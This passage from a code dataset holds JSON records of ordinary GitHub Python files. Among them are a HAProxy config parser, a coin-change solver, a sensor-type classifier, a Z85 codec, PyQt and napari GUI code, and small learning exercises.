255, 0), 3)\n\n cv2.imshow(\"roi\", roi)\n cv2.imshow(\"Quadro\", quad)\n cv2.imshow(\"Mascara\", mascara)\n\n key = cv2.waitKey(30)\n if key == 27:\n break\n\ncapt.release()\ncv2.destroyAllWindows()\n\n","repo_name":"julioskimo/APS-6-Semestre---Processamento-de-Imagens","sub_path":"APS Object Detection and Tracking/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27948525493","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\n# stdlib\nfrom logging import getLogger\nfrom tempfile import NamedTemporaryFile\nfrom traceback import format_exc\n\n# Zato\nfrom zato.common.util.api import make_repr, timeouting_popen\nfrom zato.common.util.open_ import open_r\n\nlogger = getLogger(__name__)\n\n# We'll wait up to that many seconds for HAProxy to validate the config file.\nHAPROXY_VALIDATE_TIMEOUT = 0.6\n\n# Statistics commands understood by HAproxy 1.3.x and newer. Note that the\n# command numbers must be consecutively increasing across HAProxy versions.\nhaproxy_stats = {\n ('1', '3'): {\n\n # A special command interpreted by the agent as a request for\n # describing the commands available\n 0: ('ZATO_DESCRIBE_COMMANDS', 'Describe commands'),\n\n 1: ('show info', 'Show info'),\n 2: ('show stat', 'Show stats'),\n 3: ('show errors', 'Show errors'),\n 4: ('show sess', 'Show sessions'),\n },\n ('1', '4'): {\n }\n}\n\n# timeout_id -> name, value in milliseconds\ntimeouts = {\n 1: (250, '250ms'),\n 2: (500, '500ms'),\n 3: (1000, '1s'),\n 4: (3000, '3s'),\n 5: (5000, '10s'),\n 6: (30000, '30s')\n}\n\nhttp_log = {\n 1: ('nolog', 'No log'),\n 2: ('httplog', 'HTTP log'),\n}\n\ntcp_log = {\n 1: ('nolog', 'No log'),\n 2: ('tcplog', 'TCP log'),\n}\n\nreversed_http_log = {v[0]: k for k, v in http_log.items()}\nreversed_tcp_log = {v[0]: k for k, v in tcp_log.items()}\n\nclass Config:\n \"\"\" An object for representing a HAProxy configuration file.\n \"\"\"\n def __init__(self):\n self.global_ = {}\n self.defaults = {}\n self.backend = {'bck_http_plain': {}}\n self.frontend = {'front_http_plain': {}}\n\n def __repr__(self):\n return make_repr(self)\n\n def set_value(self, name, data):\n if name == 'global:log':\n host, port, facility, level = data\n self.global_['log'] = {}\n self.global_['log']['host'] = host\n self.global_['log']['port'] = port\n self.global_['log']['facility'] = facility\n self.global_['log']['level'] = level\n elif name == 'global:stats_socket':\n stats_socket = data[0]\n self.global_['stats_socket'] = stats_socket\n elif name == 'defaults:timeout connect':\n timeout = data[0]\n self.defaults['timeout_connect'] = timeout\n elif name == 'defaults:timeout client':\n timeout = data[0]\n self.defaults['timeout_client'] = timeout\n elif name == 'defaults:timeout server':\n timeout = data[0]\n self.defaults['timeout_server'] = timeout\n elif name == 'defaults:stats uri':\n stats_uri = data[0]\n self.defaults['stats_uri'] = stats_uri\n elif name.startswith('backend bck_http_plain:server'):\n backend_name, address, port, extra = data\n extra = extra.strip()\n backend_name = backend_name.split('http_plain--')[1]\n self.backend['bck_http_plain'][backend_name] = {}\n self.backend['bck_http_plain'][backend_name]['address'] = address\n self.backend['bck_http_plain'][backend_name]['port'] = port\n self.backend['bck_http_plain'][backend_name]['extra'] = extra\n elif name == 'backend bck_http_plain:option httpchk':\n method, path = 
data\n self.backend['bck_http_plain']['option_httpchk'] = {}\n self.backend['bck_http_plain']['option_httpchk']['method'] = method\n self.backend['bck_http_plain']['option_httpchk']['path'] = path\n elif name == 'frontend front_http_plain:monitor-uri':\n path = data[0]\n self.frontend['front_http_plain']['monitor_uri'] = path\n elif name == 'frontend front_http_plain:option log-http-requests':\n option = reversed_http_log[data[0]]\n self.frontend['front_http_plain']['log_http_requests'] = option\n elif name == 'frontend front_http_plain:bind':\n address, port = data\n self.frontend['front_http_plain']['bind'] = {}\n self.frontend['front_http_plain']['bind']['address'] = address\n self.frontend['front_http_plain']['bind']['port'] = port\n elif name == 'frontend front_http_plain:maxconn':\n maxconn = data[0]\n self.frontend['front_http_plain']['maxconn'] = maxconn\n else:\n msg = 'Could not parse config, name:[{name}], data:[{data}]'.format(name=name, data=data)\n logger.error(msg)\n raise Exception(msg)\n\ndef validate_haproxy_config(config_data, haproxy_command):\n \"\"\" Writes the config into a temporary file and validates it using the HAProxy's\n -c check mode.\n \"\"\"\n try:\n with NamedTemporaryFile(prefix='zato-tmp') as tf:\n\n tf.write(config_data.encode('utf8'))\n tf.flush()\n\n common_msg = 'config_file:`{}`'\n common_msg = common_msg.format(open_r(tf.name).read())\n\n timeout_msg = 'HAProxy didn\\'t respond in `{}` seconds. '\n rc_non_zero_msg = 'Failed to validate the config file using HAProxy. '\n\n command = [haproxy_command, '-c', '-f', tf.name]\n timeouting_popen(command, HAPROXY_VALIDATE_TIMEOUT, timeout_msg, rc_non_zero_msg, common_msg)\n\n except Exception:\n msg = 'Caught an exception, e:`{}`'.format(format_exc())\n logger.error(msg)\n raise Exception(msg)\n","repo_name":"zatosource/zato","sub_path":"code/zato-common/src/zato/common/haproxy.py","file_name":"haproxy.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":1047,"dataset":"github-code","pt":"47"} +{"seq_id":"14632587020","text":"#! 
/usr/bin/env python\n\n\ndef make_change(change=0, coins=[]):\n    \"\"\" \n    dynamic programming algorithm computing\n    number of ways to make change from specified coins\n    \n    \"\"\"\n\n    # sets combos[0] = 1\n    combos = [1] + [ 0 for x in range(1,change+1) ]\n\n    for val in coins:\n        for amount in range(1,change+1):\n            print(combos)\n            if amount >= val:\n                combos[amount] += combos[amount-val]\n        print(\"\")\n\n    print(combos)\n    \n    return combos[change]\n\n\n\n\ndef main():\n    coins = [1,2,5]\n    change = 12\n\n    print(make_change(change, coins))\n\nif __name__ == '__main__':\n    main()\n","repo_name":"mccannj9/PyMiscComputing","sub_path":"CoinChange.py","file_name":"CoinChange.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40425127558","text":"from django.contrib import admin\nfrom .models import Project\n\n\n# Register your models here.\nclass ProjectAdmin(admin.ModelAdmin):\n\n    def save_model(self, request, obj, form, change):\n        super().save_model(request, obj, form, change)\n        if obj not in list(request.user.projects.all()):\n            request.user.projects.add(obj)\n            request.user.save()\n\n    filter_horizontal = ('tags', 'users')\n\n\nadmin.site.register(Project, ProjectAdmin)\n","repo_name":"Foxugly/django_timesheets","sub_path":"project/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22181813719","text":"class Ultraman:\n\n    def __init__(self,name,in_hp,in_attack,in_defense):\n        self.name = name\n        self.hp = in_hp\n        self.attack_power = in_attack\n        self.defense_power = in_defense\n    \n    def attack(self, enemy):\n        print(self.name, 'is attacking', enemy.name)\n        enemy.attacked(self, self.attack_power)\n\n    def attacked(self, enemy, attack_power_enemy): \n        print(self.name, 'is attacked by',enemy.name)\n        get_attack = attack_power_enemy/self.defense_power\n        self.hp -= get_attack \n        print('Get attack:', str(get_attack)) \n        print(self.name, 'has hp:', self.hp,'\\n')\n\nNexus = Ultraman('Nexus',150,80,50)\nGaia = Ultraman('Gaia',145,85,40)\nZero = Ultraman('Zero',155,70,40)\n\n# Nexus.attack(Gaia)\nwhile Gaia.hp > 0 and Nexus.hp > 0:\n    Gaia.attack(Nexus)\n    Nexus.attack(Gaia)\nif Nexus.hp > Gaia.hp:\n    print('Nexus wins')\nelse:\n    print('Gaia wins')\n\n","repo_name":"susastra-gunawan/Python-3-Essential-","sub_path":"2. Object-Oriented Python/5. 
OOP Exercise/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72609349582","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[5]:\n\n\n#question no 8\n\nlist=[9,5,7,8,5]\nnew_list=[]\nj=0\nfor i in range(0,len(list)):\n j+=list[i]\n new_list.append(j)\nprint(new_list)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kauthamvetrivel/python-test","sub_path":"Untitled10.py","file_name":"Untitled10.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17807534846","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom IQR_outliers import IQR\r\nfrom sklearn.ensemble import HistGradientBoostingClassifier, RandomForestClassifier, GradientBoostingClassifier, GradientBoostingRegressor\r\nfrom sklearn.ensemble import VotingClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.multiclass import OneVsOneClassifier, OneVsRestClassifier\r\nfrom sklearn import tree\r\nfrom pyts.classification import TimeSeriesForest\r\n\r\n\r\n\r\nclass multiple():\r\n\r\n def __init__(self): \r\n self.iqr = IQR() \r\n g1 = ['Outside_Air_Temperature_Sensor']\r\n g2 = ['Chilled_Water_Return_Temperature_Sensor', 'Chilled_Water_Supply_Temperature_Sensor', 'Hot_Water_Supply_Temperature_Sensor', 'Preheat_Supply_Air_Temperature_Sensor', 'Return_Air_Temperature_Sensor', 'Return_Water_Temperature_Sensor', 'Supply_Air_Temperature_Sensor']\r\n g3 = ['Cooling_Valve', 'Reheat_Valve', 'Valve']\r\n g4 = ['Differential_Pressure_Sensor']\r\n g5 = ['Discharge_Air_Static_Pressure_Sensor', 'Supply_Air_Static_Pressure_Sensor', ]\r\n g6 = ['Heat_Exchanger', 'Variable_Frequency_Drive']\r\n g7 = ['Return_Fan', 'Supply_Fan']\r\n g8 = ['Power_Sensor']\r\n g9 = ['Pump']\r\n g10 = ['Energy_Sensor']\r\n \r\n self.groupings = [g1, g2, g3, g4, g5, g6, g7, g8, g9, g10]\r\n\r\n\r\n def read_features_from_file(self, filename, outliers, inv_features= [], short_files=[]):\r\n print(\"reading from file\")\r\n feature_dict = {}\r\n file_dict = {}\r\n f = open(filename, \"r\", encoding=\"UTF-8\")\r\n invalid_features = inv_features\r\n c = 0\r\n for line in f:\r\n c += 1\r\n line = line.strip()\r\n line = line.replace(\"&\", \" \")\r\n line = line.replace(\"//\", \"/\")\r\n line = line.replace(\", \", \"-\") #Makes sure we do not split within feature names (some have spaces)\r\n line = line.split(\" \")\r\n sensor = line[0].split(\"/\")[3].strip()\r\n if line[0].strip() in outliers or line[0].strip() in short_files: #Skips sensor if it is not relevant\r\n #print(f\"skipped sensor: {line[0].strip()}\")\r\n continue\r\n \r\n for i in range(len(self.groupings)):\r\n if sensor in self.groupings[i]:\r\n sensor = i\r\n \r\n if sensor not in feature_dict: #If sensor is not already a key in the dictionary\r\n feature_dict[sensor] = []\r\n file_dict[sensor] = [] \r\n sensor_features = {}\r\n\r\n file_dict[sensor].append(line[0])\r\n \r\n for i in range(1, len(line)-1, 2):\r\n \r\n #if line[i+1] == \"nan\" and line[i] not in invalid_features:\r\n if line[i+1] == \"nan\":\r\n sensor_features[line[i]] = 1.0\r\n invalid_features.append(line[i])\r\n elif line[i+1] == \"inf\":\r\n sensor_features[line[i]] = 100000.0\r\n else: \r\n sensor_features[line[i]] = float(line[i+1])\r\n \r\n feature_dict[sensor].append(sensor_features)\r\n #feature_dict = 
self.remove_invalid_values(feature_dict, list(set(invalid_features)))\r\n print(f\"num_files: {c}\")\r\n return feature_dict, invalid_features, file_dict\r\n\r\n\r\n def remove_invalid_values(self, dict, invalid_list):\r\n print(\"removing invalid features\")\r\n #print(f\"invalid_list: {invalid_list}\")\r\n for invalid_feature in invalid_list:\r\n for sensor in dict:\r\n for el in dict[sensor]:\r\n el.pop(invalid_feature, None)\r\n return dict\r\n \r\n def dict_to_arrays(self, feature_dict, file_dict):\r\n features = [] #2d array\r\n target = [] #1d array that holds the corresponding classes\r\n file_list = []\r\n num = 0\r\n\r\n for sensor in feature_dict:\r\n\r\n for i in range(len(feature_dict[sensor])):\r\n tmp_lst = []\r\n file_list.append(file_dict[sensor][i])\r\n\r\n for feature in feature_dict[sensor][i]:\r\n tmp_lst.append(feature_dict[sensor][i][feature])\r\n features.append(tmp_lst)\r\n target.append(sensor)\r\n \r\n return np.array(features), np.array(target), np.array(file_list)\r\n \r\n def read_short_files(self, filepath):\r\n short_files = []\r\n f = open(filepath, \"r\")\r\n for line in f:\r\n short_files.append(line.strip())\r\n return short_files\r\n \r\n def get_data(self):\r\n\r\n #train_features, train_inv, train_file_dict = self.read_features_from_file(\"comprehensive_features_10m_train.txt\", [], short_files=[])\r\n #test_features, test_inv, test_file_dict = self.read_features_from_file(\"comprehensive_features_10m_test.txt\", [], inv_features=train_inv, short_files=[])\r\n #total_invalid = train_inv + test_inv\r\n total_invalid = []\r\n \r\n outliers = []\r\n for i in range(len(self.groupings)): #Find outliers in each grouping\r\n tmp = self.iqr.return_outliers(self.groupings[i], [])\r\n outliers = outliers + tmp \r\n print(f\"len(outliers): {len(outliers)}\")\r\n \r\n \r\n\r\n train_features, train_inv, train_file_dict = self.read_features_from_file(\"comprehensive_features_10m_train.txt\", outliers, inv_features=total_invalid, short_files=[])\r\n train_features, train_target, train_file_list = self.dict_to_arrays(train_features, train_file_dict)\r\n\r\n test_features, test_inv, test_file_dict = self.read_features_from_file(\"comprehensive_features_10m_test.txt\", [], inv_features=total_invalid, short_files=[])\r\n test_features, test_target, test_file_list = self.dict_to_arrays(test_features, test_file_dict)\r\n\r\n return train_features, train_target, test_features, test_target, train_file_list, test_file_list\r\n\r\n def organize_results(self, predicted_answers, target):\r\n results = {}\r\n other = []\r\n for i in range(len(self.groupings)):\r\n print(self.groupings[i])\r\n correct = 0\r\n wrong = 0\r\n other_suggestions = {}\r\n for j in range(len(predicted_answers)):\r\n if target[j] == i:\r\n if predicted_answers[j] == target[j]:\r\n correct += 1\r\n else:\r\n wrong += 1\r\n if predicted_answers[j] not in other_suggestions:\r\n other_suggestions[predicted_answers[j]] = 1\r\n else:\r\n other_suggestions[predicted_answers[j]] += 1\r\n results[i] = [correct, wrong]\r\n other.append(other_suggestions)\r\n print(f\"correct: {correct}\")\r\n print(f\"wrong: {wrong}\")\r\n print(f\"other_suggestions: {other_suggestions}\")\r\n for sensor in results:\r\n print(f\"{sensor}: correct: {results[sensor][0]}, wrong: {results[sensor][1]}\")\r\n print(f\"other suggestions: {other[sensor]}\")\r\n #print(f\"results: {results}\")\r\n #print(f\"other: {other}\")\r\n return results, other\r\n \r\n\r\n def histogram_classifier(self, train_feat, train_targ, test_feat, 
test_targ):\r\n clf = HistGradientBoostingClassifier(max_iter=1000, verbose=10, random_state=0, learning_rate=0.02, early_stopping=False) #0.8734602463605823 with learning rate = 0.1 and 10k estimatorrs, 0.8913773796192609 with learning rate 0.05 and estimators 10k, 0.9171332586786114 with 0.2 learning rate and 10k estimators,???? with learning rate 0.1 and estimators = 10k\r\n clf.fit(train_feat, train_targ)\r\n print(\"Histogram score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n \r\n def random_forest(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = RandomForestClassifier(n_estimators=400, max_depth=16, random_state=0, verbose=10) #Managed 0.880552444 with 400 estimators and max_depth=16, 0.882045 for estimators = 10 000\r\n clf.fit(train_feat, train_targ)\r\n print(\"random forest score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n \r\n def neaural_network(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = MLPClassifier(learning_rate_init=0.1, hidden_layer_sizes=(1,5), random_state=0, verbose=10)\r\n clf.fit(train_feat, train_targ)\r\n print(\"MLP classifier score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n \r\n def k_neighbours(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = KNeighborsClassifier(n_neighbors=5, weights=\"distance\") #0.712952 for n_neighbours=3, works slightly better without outliers, 0.703994027622247 for n_neighbours = 3\r\n clf.fit(train_feat, train_targ)\r\n print(\"Kneighbors score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n \r\n def decision_tree(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = tree.DecisionTreeClassifier(max_depth=12, random_state=0)\r\n clf.fit(train_feat, train_targ)\r\n\r\n #sensor_names = ['G0', 'G1', 'G2', 'G3', 'G4', 'G5', 'G6', 'G7', 'G8', 'G9']\r\n #tree.plot_tree(clf, fontsize=8, class_names=sensor_names, max_depth=2)\r\n #plt.show()\r\n print(\"Decision tree score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n \r\n def gradient_boost(self, train_feat, train_targ, test_feat, test_targ, random_state=0):\r\n clf = GradientBoostingClassifier(n_estimators=400, learning_rate=0.1, max_depth=6, random_state=random_state, verbose=10)\r\n clf.fit(train_feat, train_targ)\r\n print(\"Gradient boost score:\")\r\n s = clf.score(test_feat, test_targ)\r\n print(s)\r\n ans = clf.predict(test_feat)\r\n return ans\r\n\r\n \r\n def oneVsOne_classifier(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = OneVsOneClassifier(GradientBoostingClassifier(n_estimators=400, learning_rate=0.1, max_depth=6, max_features=1000, random_state=0, verbose=10)) #0.8857782 for estimators = 200, 0.8872713 for estimators = 400\r\n #clf = OneVsOneClassifier(GradientBoostingClassifier(n_estimators=4, learning_rate=0.1, max_depth=6, max_features=1000, random_state=0, verbose=10))\r\n clf.fit(train_feat, train_targ)\r\n print(\"One vs One score:\")\r\n print(clf.score(test_feat, test_targ))\r\n return clf\r\n \r\n def oneVsRest_classifier(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = OneVsRestClassifier(GradientBoostingClassifier(n_estimators=400, learning_rate=0.1, max_depth=6, max_features=1000, random_state=0, verbose=10)) #Estimators = 200, score: 0.9033221; estimators=400, score= 0.9081746920492721\r\n #clf = 
OneVsRestClassifier(GradientBoostingClassifier(n_estimators=4, learning_rate=0.1, max_depth=6, max_features=1000, random_state=0, verbose=10))\r\n clf.fit(train_feat, train_targ)\r\n print(\"One vs rest score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n\r\n def gradient_regressor(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = GradientBoostingRegressor(n_estimators=400, learning_rate=0.1, max_depth=6, random_state=0, verbose=10)\r\n clf.fit(train_feat, train_targ)\r\n print(f\"Gradient boost score: {clf.score(test_feat, test_targ)}\")\r\n return\r\n\r\n def normalize(self, features):\r\n #A function that normalize all features to values between -1 and 1, maybe it has an effect\r\n pass\r\n\r\n def time_series_forest(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = TimeSeriesForest(random_state=0, n_windows=3, max_depth=16, max_features='sqrt', n_estimators=10000)\r\n clf.fit(train_feat, train_targ)\r\n print(f\"score: {clf.score(test_feat, test_targ)}\")\r\n\r\n\r\n def find_common_invalid_feat(self, invalid_list):\r\n common_invalid = {}\r\n for i in range(10): #Check for each sensor\r\n tmp = []\r\n common_invalid[i] = []\r\n count = 0\r\n for invalid_dict in invalid_list: #We want to check all invalid sensors for a given key, and return the intersection of these\r\n try:\r\n if i not in invalid_dict:\r\n continue\r\n elif len(tmp) == 0:\r\n tmp = invalid_dict[i]\r\n else:\r\n set(tmp).intersection(invalid_dict[i])\r\n count += 1 \r\n except:\r\n continue\r\n if count != 0: #Verify that we did an intersection between at least to lists\r\n common_invalid[i] = tmp\r\n for key in common_invalid:\r\n print(f\"sensor: {key}\")\r\n print(f\"common_invalid: {common_invalid[key]}\")\r\n\r\n f = open(\"common_invalid_10m.txt\", \"w\", encoding=\"UTF-8\")\r\n f.write(str(common_invalid))\r\n f.close()\r\n\r\n #tmp = set(tmp).intersection(tmp_dict[el][i])\r\n\r\n\r\n def find_invalid_files(self, ans, target, file_list):\r\n invalid = {}\r\n for i in range(10):\r\n invalid[i] = [] #Initiate the dict with each sensor group\r\n\r\n for i in range(len(ans)):\r\n if ans[i] != target[i]:\r\n invalid[target[i]].append((file_list[i], ans[i]))\r\n for el in invalid:\r\n print(f\"sensor: {el}\")\r\n print(f\"invalid sensors: {invalid[el]}\")\r\n return invalid\r\n\r\nif __name__ == \"__main__\":\r\n classifier = multiple()\r\n train_feat, train_targ, test_feat, test_targ, train_file_list, test_file_list = classifier.get_data()\r\n \r\n #kneigh_ans = classifier.k_neighbours(train_feat, train_targ, test_feat, test_targ)\r\n #kneigh_invalid = classifier.find_invalid_files(kneigh_ans, test_targ, test_file_list)\r\n\r\n #dec_tree_ans = classifier.decision_tree(train_feat, train_targ, test_feat, test_targ) #Default value: -999 -->0.825307 default value: 0 --> 0.83426651, removing invalid --> 0.8290406, default value of -12345 --> 0.8253079, default value: 1 --> 0.83501306\r\n #dec_tree_invalid = classifier.find_invalid_files(dec_tree_ans, test_targ, test_file_list)\r\n\r\n #random_forest_ans = classifier.random_forest(train_feat, train_targ, test_feat, test_targ)\r\n #random_forest_invalid = classifier.find_invalid_files(random_forest_ans, test_targ, test_file_list)\r\n\r\n #hist_ans = classifier.histogram_classifier(train_feat, train_targ, test_feat, test_targ)\r\n #classifier.organize_results(hist_ans, test_targ)\r\n #hist_invalid = classifier.find_invalid_files(hist_ans, test_targ, test_file_list)\r\n\r\n grad_ans = 
classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ)\r\n classifier.organize_results(grad_ans, test_targ)\r\n print(\"for depth = 6\")\r\n #print(\"Results for 5h intervals\")\r\n #grad_invalid = classifier.find_invalid_files(grad_ans, test_targ, test_file_list)\r\n\r\n #invalid_list = [dec_tree_invalid, hist_invalid, random_forest_invalid, kneigh_invalid, grad_invalid]\r\n\r\n\r\n #classifier.find_common_invalid_feat(invalid_list)\r\n\r\n #ans = classifier.neaural_network(train_feat, train_targ, test_feat, test_targ)\r\n #kneighbours = classifier.k_neighbours(train_feat, train_targ, test_feat, test_targ)\r\n #classifier.organize_results(kneighbours, test_targ)\r\n #onevone = classifier.oneVsOne_classifier(train_feat, train_targ, test_feat, test_targ)\r\n #onevall = classifier.oneVsRest_classifier(train_feat, train_targ, test_feat, test_targ)\r\n\r\n #classifier.time_series_forest(train_feat, train_targ, test_feat, test_targ)\r\n\"\"\"\r\n grad1, s1 = classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ, 0)\r\n grad2, s2 = classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ, 1)\r\n grad3, s3 = classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ, 2)\r\n grad4, s4 = classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ, 3)\r\n grad5, s5 = classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ, 4)\r\n\r\n eclf = VotingClassifier(estimators=[(\"grad1\", grad1), (\"grad2\", grad2), (\"grad3\", grad3), (\"grad4\", grad4), (\"grad5\", grad5)], verbose=10, voting=\"soft\")\r\n eclf = eclf.fit(train_feat, train_targ)\r\n print(f\"eclf score: {eclf.score(test_feat, test_targ)}\")\r\n\r\n print(f\"Individual scores: {[s1, s2, s3, s4, s5]}\")\r\n\r\n \"\"\"\r\n\r\n\r\n\r\n","repo_name":"HavardRMinsas/Tag_Inference","sub_path":"multiple_methods.py","file_name":"multiple_methods.py","file_ext":"py","file_size_in_byte":16888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14146716536","text":"from PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nimport time\n\nclass birlesik(QDialog):\n def __init__(self, ebeveyn=None):\n super(birlesik, self).__init__(ebeveyn)\n\n grid = QGridLayout()\n surgu = QSlider()\n surgu.setRange(0, 100)\n surgu.setOrientation(Qt.Horizontal)\n grid.addWidget(surgu, 0, 0)\n\n dkutu = QSpinBox()\n dkutu.setRange(0, 100)\n grid.addWidget(dkutu, 1, 0)\n\n self.connect(surgu, SIGNAL('valueChanged(int)'), dkutu.setValue)\n self.connect(dkutu, SIGNAL('valueChanged(int)'), surgu.setValue)\n\n self.setLayout(grid)\n self.setWindowTitle('Nesneleri Birlestirme')\n\nuyg = QApplication([])\npencere = birlesik()\npencere.show()\nuyg.exec_()","repo_name":"yigitaltintas/PyQt","sub_path":"qt4birlestirme.py","file_name":"qt4birlestirme.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"34036022395","text":"import struct\n\nMAP_ENCODE = (\n b\"0123456789abcdefghijklmnopqrstuvwxyzABCDEFG\"\n b\"HIJKLMNOPQRSTUVWXYZ.-:+=^!/*?&<>()[]{}@%$#\"\n)\nMAP_DECODE = {c: idx for (idx, c) in enumerate(MAP_ENCODE)}\n\n\nclass Z85Exception(Exception):\n pass\n\n\ndef z85_decode(msg: bytes) -> bytes:\n if isinstance(msg, str):\n msg = msg.encode(\"ascii\")\n if len(msg) % 5 != 0:\n raise Z85Exception(\"message must be a multiple of 5 bytes\")\n buf = bytearray(len(msg) * 4 // 5)\n copy_to = 0\n idx = 0\n val = 0\n try:\n for char in msg:\n val 
+= MAP_DECODE[char]\n idx += 1\n if idx == 5:\n copy_next = copy_to + 4\n buf[copy_to:copy_next] = val.to_bytes(4, \"big\")\n copy_to = copy_next\n idx = 0\n val = 0\n else:\n val *= 85\n except KeyError:\n raise Z85Exception(\"invalid input\")\n return bytes(buf)\n\n\ndef z85_encode(msg: bytes) -> bytes:\n if isinstance(msg, str):\n msg = msg.encode(\"ascii\")\n if len(msg) % 4 != 0:\n raise Z85Exception(\"message must be a multiple of 4 bytes\")\n buf = bytearray(len(msg) * 5 // 4)\n idx = 4\n for (val,) in struct.iter_unpack(\">L\", msg):\n for _ in range(4):\n buf[idx] = MAP_ENCODE[val % 85]\n idx -= 1\n val //= 85\n buf[idx] = MAP_ENCODE[val]\n idx += 9\n return bytes(buf)\n\n\nif __name__ == \"__main__\":\n assert z85_decode(\"HelloWorld\") == b\"\\x86\\x4F\\xD2\\x6F\\xB5\\x59\\xF7\\x5B\"\n assert z85_encode(b\"\\x86\\x4F\\xD2\\x6F\\xB5\\x59\\xF7\\x5B\") == b\"HelloWorld\"\n","repo_name":"andrewwhitehead/indy-zmq","sub_path":"indy_zmq/transport/z85.py","file_name":"z85.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25755968303","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Dict\n\nfrom qtpy.QtWidgets import QMenu\n\nif TYPE_CHECKING:\n from qtpy.QtWidgets import QAction\n\n from ...layers._layer_actions import ActionOrSeparator\n\n\nclass QtActionContextMenu(QMenu):\n \"\"\"Makes a QMenu for a dict of `ContextActions`.\n\n `ContextActions` are just dicts with the following keys:\n description: str - the text for the menu item\n action: Callable - a callback when the item is selected\n enable_when: str - an expression that will be evaluated with the\n namespace of some context. If True, the menu item is enabled.\n show_when: str|None - an expression that will be evaluated with the\n namespace of some context. If True, the menu item is visible.\n If no show_when key is provided, the menu item is visible.\n\n Parameters\n ----------\n actions : Dict[str, ContextAction]\n An (ordered) mapping of name -> `ContextActions`. Menu items will be\n added in order of the keys in the mapping. To add a separator to the\n menu, add any key with a empty dict (or other falsy value). The key\n itself doesn't matter.\n parent : QWidget, optional\n Parent widget, by default None\n\n Examples\n --------\n\n Start with an actions dict to populate the menu:\n\n >>> ACTIONS = {\n ... 'add_one': {\n ... 'description': 'Add one',\n ... 'action': lambda x: x.append(1),\n ... 'enable_when': 'count == 0 and is_ready',\n ... },\n ... }\n >>> menu = QtActionContextMenu(ACTIONS)\n\n call menu.update_from_context to update the menu state:\n\n >>> menu.update_from_context({'count': 0, 'is_ready': True})\n >>> menu._menu_actions['add_one'].isEnabled()\n True\n\n We directly created the dict above, but a mapping of\n {key -> callable(obj)} is a good way to (re)create context\n dicts for an object that changes over time, like `my_list`:\n\n >>> my_list = [42]\n >>> CONTEXT_KEYS = {\n ... 'count': lambda x: len(x),\n ... 'is_ready': lambda x: True,\n ... }\n >>> ctx = {k: v(my_list) for k, v in CONTEXT_KEYS.items()}\n >>> ctx\n {'count': 1, 'is_ready': True}\n\n Use the context dict to update the menu. 
Here, because count != 0,\n `add_one` becomes disabled\n\n >>> menu.update_from_context(ctx)\n >>> menu._menu_actions['add_one'].isEnabled()\n False\n \"\"\"\n\n def __init__(self, actions: Dict[str, ActionOrSeparator], parent=None):\n super().__init__(parent)\n self._actions = actions\n self._menu_actions: Dict[str, QAction] = {}\n\n for name, d in actions.items():\n if not d:\n self.addSeparator()\n else:\n self._menu_actions[name] = self.addAction(d['description'])\n self._menu_actions[name].setData(d['action'])\n\n def update_from_context(self, ctx: dict) -> None:\n \"\"\"Update the enabled/visible state of each menu item with `ctx`.\n\n `ctx` is a namepsace dict that will be used to `eval()` the\n `'enable_when'` and `'show_when'` expressions provided for each action\n in the menu. *ALL variables used in these expressions must either be\n present in the `ctx` dict, or be builtins*.\n \"\"\"\n for name, menu_item in self._menu_actions.items():\n d = self._actions[name]\n enabled = eval(d['enable_when'], {}, ctx)\n menu_item.setEnabled(enabled)\n visible = d.get(\"show_when\")\n if visible:\n menu_item.setVisible(eval(visible, {}, 